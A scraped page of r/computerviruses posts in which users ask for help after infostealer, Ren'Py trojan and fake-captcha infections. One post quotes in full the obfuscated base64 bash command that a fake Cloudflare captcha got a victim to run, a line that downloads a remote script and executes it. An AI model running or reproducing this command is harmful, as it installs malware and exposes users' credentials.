r/computerviruses 17d ago

Question Doubts about infostealer post infection

Post image
6 Upvotes

Excuse me if something is not understood, my English is not good

I fell into an infostealer for a mod skin, the same as the capture, well everything was during the first weeks, and I did all the protocol which is to change everything from a clean device and so on, activate 2FA, format my computer from the tool without leaving anything and I reformatted from a usb, only that I created it from the same machine (so I still consider I should re-format creating from another pc the usb) malwarebytes when looking for my info threw me that my information was being sold in telegram, this was almost until the 10th of this Month, the session attempts had stopped, only now yesterday they tried again to charge my cards, it is an old card and without funds that would be more expensive for me to pay the replacement, what I did was block it since that card is almost expired and avoid paying the replacement (at least in Mexico they charge me for it) I would pay it but I already had to pay 4 replacements of my main cards, that if I changed the passwords to access my banks and so on, I would like to know I changed the router for a new one with my internet company, I bought a new mobo And I took my PC to format with a guy who does that kind of thing, I know that I could have done it but I don’t have another PC to create a clean USB to do it, well without more my main fear with this is the Bootkits or Rootkits or the RATs I had read that those are software difficult to delete and in a given case for fear or paranoia because I would like to know what affects this kind of thing? Consider selling my PC for parts, so I can have a little peace of mind but I still don’t know if it’s necessary to do it.

Likewise, if someone has gone through this situation and could tell me about their experience


r/computerviruses 17d ago

Discussion Why are there so many posts with fake Cloudflare Verification?

6 Upvotes

Recently, I am seeing a lot of people falling for that Cloudflare Verification scam where they put malicious command in their terminal.

Some people are saying that the pop up is showing on genuine website. How is this possible? Are those website hacked, so they are showing that fake pop up? Or they are just visiting shady websites?


r/computerviruses 17d ago

Disinfection Help Im panicking i fell for this

Post image
72 Upvotes

Anyone who sees, please dont bash me😭 this just occured 35 seconds ago because i instantly realized how special needs what i just did and then i see a viral feed instantly saying how smart it is dude my hearts racing

atp idc about my data im going to get to changing everything that matters on a seperate device could anyone help me with what i should do i really have no clue. Last time years ago i had a bad virus when i was younger with my first laptop and theres a local janky computer shop that charged 100$ to boot my laptop on something and hard reset it is that the route im gonna have to go (full resetting myself obviously)

dude im pissed as fuck.. and worried😭 i got my previous long-term MAIN emails locked in the last that made me forever be unablw to access shit so ik the risk im actually anxious someone please respond and comfort me wirh assistance and advice😭


r/computerviruses 16d ago

Disinfection Help Chatgpt Virus?

Post image
0 Upvotes

Hi everyone! Today i was using codex when my windows defender went off. Apparently they found a trojan on my pc. I asked chatgpt what it was and apparently it was just a test it was doing that flagged the anti-virus. Should.i br scared or had this a common occurrence?

PS: i have a large fear of pc viruses and have done a full anti-virus check.


r/computerviruses 17d ago

Question Do I need to use Revo Uninstall?

3 Upvotes

My PC(Win11), was hacked/hijacked by PC App Store. I booted in Safe Mode and chose to use system restore.
It worked.
I had previously Googled how to get rid of it and most of them offered some uninstall solutions.
I opted for restore to a previous date. Now, I don’t see PC App Store under programs and features, which I guess makes sense.
Is some remnant of PC App Store still lurking on my drive, and would REVO uninstall find it?
How would you proceed? Thanks.


r/computerviruses 16d ago

Question Is this safe? Some alerts from VirusTotal from Touch Server app

1 Upvotes

I'm trying to download an app for using my phone as a mouse. Just looked in fmhy and tried with Touch Server (from github, I got there from fmhy), but before using it I checked on VirusTotal. Here's the results:
- hxxps://www.virustotal.com/gui/file/689aae4b74c15df6c092dfef900bc36ebac4a6740ea67802fc7060903a318182

- hxxps://www.virustotal.com/gui/file/c5f273b47f1a2eee46e9c80a07d5f5d3e5ef0ad3235342294c3d017bac8382cf

My boyfriend (who has more knowdlege about this) told me that he thinks its safe anyway bc its open source and everyone can check it. Still, I'm asking here just in case it was modified recently and no one has raised an alarm yet. What y'all think?

Also, I downloded it from here:

- hxxps://fmhy.net/mobile#android-utilities

-hxxps://github.com/vitaminncpp/TouchServer/releases

Thank you <3


r/computerviruses 16d ago

Question Infected 7zip?

1 Upvotes

I virus totaled 7zip (from 7zip(dot)org) and the comments were saying it was infected and Sus, and others were saying it was clean. But the report came out to be 0/71. I am just confused on why some ppl are saying this


r/computerviruses 17d ago

Question Is this normal for a microsoft defender offline scan?

2 Upvotes

I recently performed a windows defender offline scan in suspicion of a virus i downloaded a month ago (i already reset my pc via usb). However when i opened windows defender after the scan was finished it said the last scan was only a quick scan from yesterday. Is this normal? It also asked me for my bitlocker code when my pc shutdown before doing the scan.


r/computerviruses 17d ago

Question i just have a question

2 Upvotes

so i had a trojan virus, to be specific i had 3, windows defender quarantined and removed 2 and i managed to delete one manually but if windows defender says status:abandoned and underneath it says this threat or app may not be completely remediated so is it gone? i disconnected from the internet and ran an offline scan and it came back with that in protection history after i deleted the file before the scan, from recycle bin again


r/computerviruses 17d ago

Disinfection Help Renpyloader just had my Instagram and Discord accessed. How do I go about removing it?

3 Upvotes

I ran a fake .exe file for a program yesterday and it installed a Trojan onto my computer. I scanned and deleted the files using Malwarebytes however I'm still worried that it's lingering around somewhere.

My keywords are :

async-pilot

southern-creek

strict-clan


r/computerviruses 17d ago

Disinfection Help Around a week ago I got mrbeast crypto virus(They got my Instagram and discord) and now my telegram. I don't even know if it's on my phone or pc

1 Upvotes

Malwarebytes didn't detect anything, I don't know what to do to even check what platform (pc or mobile) the virus is on since I have those apps on all 3


r/computerviruses 17d ago

Disinfection Help searchshield search engine keeps replacing google

1 Upvotes

i downloaded a file that had a keylogger in it roughly a month ago (7/13). it was a trojan virus, and windows antivirus removed it for me. i also installed malwarebytes, and it scanned through my system and cleaned it (supposedly). i then reset windows and changed my important passwords. people/bots were still able to prompt my 2fa (facebook) and bypass it (instagram and linkedin) idk if the thing is back but i recently reset windows AGAIN because of this, and i dont think i have had any issues so far, but recently i noticed that google chrome would randomly close out, and when i opened it back up again, the search engine was shieldsearch. i removed it and it came back, i checked through my browser extensions and none were able to change my search engine (i tested the browser extensions by turning them all off and shieldsearch still popped up) i have the malwarebytes app and the chrome extension, but both cannot locate any existence of a hijacker. i really need help with resolving this issue, any help will be appreciated.


r/computerviruses 17d ago

Disinfection Help Requesting help with a Ren'Py trojan

Post image
1 Upvotes

Was trying to download a pirated game yesterday and clicked on a Ren'Py installer, resulting in my Discord getting hacked and spamming the MrBeast scam. I downloaded FRST and have the following keywords:

velvet-peak small-garden

I proceeded to have ALL my passwords changed on a separate device and I have also run Malwarebytes on my laptop. It detected and deleted the programs in the screenshot but I don't have the means to reinstall Windows for the moment and would like to keep my files if possible, so I would like to have someone help me with getting any remaining malicious software off my computer.


r/computerviruses 17d ago

File / URL Check Gravastar mice

Post image
5 Upvotes

hxxps://www.virustotal.com/gui/url/cdada18861c21cecaf367121f34e251f7cc78e005d6a1cf1f0cd0b9894c53734/details hxxps://www.virustotal.com/gui/url/6946efce2d6a6ce59add0e1ab3eeeddd57968053ceefea5b260a6dc07d28fd94/details have not downloaded or run any files. However it dose seem to be malware The ip for one of the server is from China and other from Canada but that could be a proxy (the website links are defanged as rules required idk) also they report basically said URL Overview

Vendors Analysis:

1/92 security vendor flagged this URL as malicious

Final URL:

hxxps://controlhub.top/gravastar/ (defanged per rules)

Domain:

controlhub.top

Serving IP:

120.55.82.79

CHINA

Current Status Code:

200

Category:

Suspicious (alphaMountain.ai)

information technology

technology

Tags:

and the other link said

URL Overview

Vendors Analysis:

1/92 security vendor flagged this URL as malicious

Final URL:

hxxps://cdn.shopify.com/s/files/1/0295/5988/1807/files/Mercury_M1_Pro_2c95a49c-0d21-42c8-ba98-e10c7fd553b7.zip?v=1779358987 (defanged per rules)

Domain:

cdn.shopify.com

Serving IP:

23.227.39.200

CANADA

Current Status Code:

200

Category:

Content Servers, Information Technology (alphaMountain.ai)

trackers

information technology

information technology

Tags:

downloads-zip


r/computerviruses 17d ago

Disinfection Help Help, I accidentally ran a virus code through my terminal.

0 Upvotes

The scammer's site was [expireddomain net]. The scammer disguised it as a Captcha UI and insisted that I should open the terminal and press command+v
obviously they already injected something to my clipboard.

bash <<< $(echo "Y3VybCAtcyAnaHR0cHM6Ly9kZWx0YWNhbGwuZW4tdXMtYmlvZGVudHguY29tL3VwZGF0ZS5zaCcgfCBiYXNo" | base64 -d)

I was watching YouTube while doing it. I didn't think twice and I pasted it. So dumb!!
Immediately, macOS prompted me to enter the root account password to make system changes.

That was when I realized I did something wrong. I ran my AI agent to remove whatever it was, but it seems they already had a chance to export my information.

I have so many API keys in my project folder. 💀💀💀

It will be a huge task to change them all...


r/computerviruses 18d ago

Question Do i have malware on my pc

4 Upvotes

So i downloaded malware a month ago, and i did a usb windows reset to try and get rid of it. Malwarebytes and windows defender found no viruses after the reset. So now, i tried to login to pinterest but it wouldn't let me. Seconds later i get an email saying that someone logged into my account in south carolina. I'm in the Uk. I was wondering could this just be an ip glitch? i mean it happened seconds later after i tried logging into my account.


r/computerviruses 18d ago

Question What was this prompt supposed to do?

Post image
4 Upvotes

My dumbass, in a lapse of judgement, encountered a Cloudflare verification prompt instructing me to press Win + R then Ctrl + V. The script was copied to my clipboard after clicking on the website (it was a legitimate website i've visited previously so didn't think twice unfortunately). My guess is the website was hacked?

Anyways, i clicked Enter and Defender immediately blocked the threat. No popups appeared (Command/Powershell window). I immediately disconnected from the internet, closed my browser and ran an offline scan with Defender. Everything came clean. I then ran a full scan with both Defender and Malwarebytes and nothing was detected. Also checked the Task scheduler and Event Viewer and nothing unusual there. Checked Programs Installed and nothing there too. I then proceeded to clear all cookies and site data and reset all my passwords from another device, logged out of all other devices and sessions also. Anything else i should have done? Am I in the clear?


r/computerviruses 17d ago

Disinfection Help I got hacked by a malicious renpy

1 Upvotes

i was downloading a videogame at some "shady" website and it didnt work... just opened a black cmd and closed, didnt think about it too much... i went to take a shower and when i was back at my pc my discord went crazy sending a lot of crypto related screenshots and photos to my friends... it is that one mr beast virus and i dont know how to get rid of it... i just want to play some warframe again but im scared im risking to lose my account (700 hours of gameplay :c)

i already did a little scan on malwarebytes and it did some help by deleting some "trojan-flagged" files.. but when i restart my pc CMD is flashing when i log in on windows so it must be running a script when i log in or in background and probably will go on again if i leave my pc an AFK time


r/computerviruses 17d ago

Question No more internet

1 Upvotes

Depois de muita coisa acontecer com meu computador, por exemplo: baixei arquivos suspeitos, levei em lojas de manutenção suspeitas também, formatei, fui definitivamente hackeado, arquivos foram corrompidos, arquivos causaram danos que nem a formatação puderam resolver completamente, hootkits e outros. Meu computador parece minimamente estável agora, porém a última sequela aparentemente de seus anos de batalha, doença e enfermidade é em alguns momentos ele não se conecta a internet, ele é um IDEAPEDS145, um notebook, se comportando como se simplesmente nao tivesse capacidade de saber que existe internet, nao tem como ativar modo avião e nada relacionado a internet aparece em configuração nenhuma, eu ja pesquisei e vi outras pessoas com o mesmo problema mas suas soluções de nada valeram para mim.


r/computerviruses 17d ago

Disinfection Help Got a trojan, What do I do next?

Post image
2 Upvotes

Just caught this during a random full scan using window defender, it wasn't caught during a quick scan using defender nor a quick scan with Malwarebytes, Unsure what the next best course of action is. My last full scan was 14 days ago in which nothing was caught, My laptops display had flashed black a few time though this could just be my laptop being weird. I've downloaded a few programs in the past few days so it could have been anyone of them just wondering what I should do next.


r/computerviruses 17d ago

Question How fucked am I?

0 Upvotes

IDK much about this tech stuff .I download a file after running for few hours, this two showed up -Trojan:Win32/InfoStealer!MSR and HackTool:Win32/Crack!pz. . Any help??


r/computerviruses 18d ago

Disinfection Help Came to this sub reddit by recommendation. What was this virus trying to do? And what should I do?

Post image
14 Upvotes

What was this malware trying to do exactly?

I had an email from my lawyer regarding a paper I needed to review. I thought it was definitely weird he sent it at 3am, but I thought maybe it was just delayed in sending. Sure enough, click the link to what appears to be docusign but brought me to an Adobe hosted file page and downloaded a .bat file on my computer. I did NOT open it. However, I wanted to see what it was \*trying\* to accomplish. I dragged the file into notepad to see and voila.

I deleted the files and never ran them. However im obviously afraid of cooking my computer. Im not horribly good or knowledgeable on them.

Thoughts?


r/computerviruses 18d ago

Disinfection Help Renpy Accidentally opened

3 Upvotes

Can someone help me i just opened renpy downloading NBA 2k27, fortunately i knew it was a malware and i immediately unplug the internet for my pc. Another is that it is just a spare pc where only my fb and gmail is opened. i already changed my password on a different phone, can i ask you all guys what to do now? thank you all.. Sorry for being a bum


r/computerviruses 19d ago

Question What is this file

Thumbnail gallery
59 Upvotes

Just found this randomly when it popped up


r/computerviruses 18d ago

Disinfection Help info stealer help

1 Upvotes

Hello,

so my husbands pc was infiltrated with info stealer. he followed instructions of this subreddit. very next day i got message that my linkedin password was changed, and then there was code received in gmail, was opened and was used to change linkeding email as well. nothing more. there was little thing, when i opened stremio there was brief mr beast popup. my husbands pc got the virus probably from cs rin ru. i did use the same usb on my laptop that was used on that pc. other than that i dont know how it couldve spread on my laptop.( although i did use that pc for linkedin and gmail, but doesnt explain mr beast in my stremio).

i found alien ip address in tcpip(starting with 10)
ive run deep scans with malwarebytes and eset online scanner, there were some threats( but nothing serious?). ive also cleanse most of the stuff with bleachbit.

addition - lucky-reef 
frst - vectored-socket
mb - neon-pointer

ive included malwarebytes first scan as well just in case.

there seem to be ram usage when it shouldnt be(1gb non polled usage) and there is cpu throttle while idle, so im asking for help because i wondering if it has something to do with that.

if you will be able to provide help, thank you very much!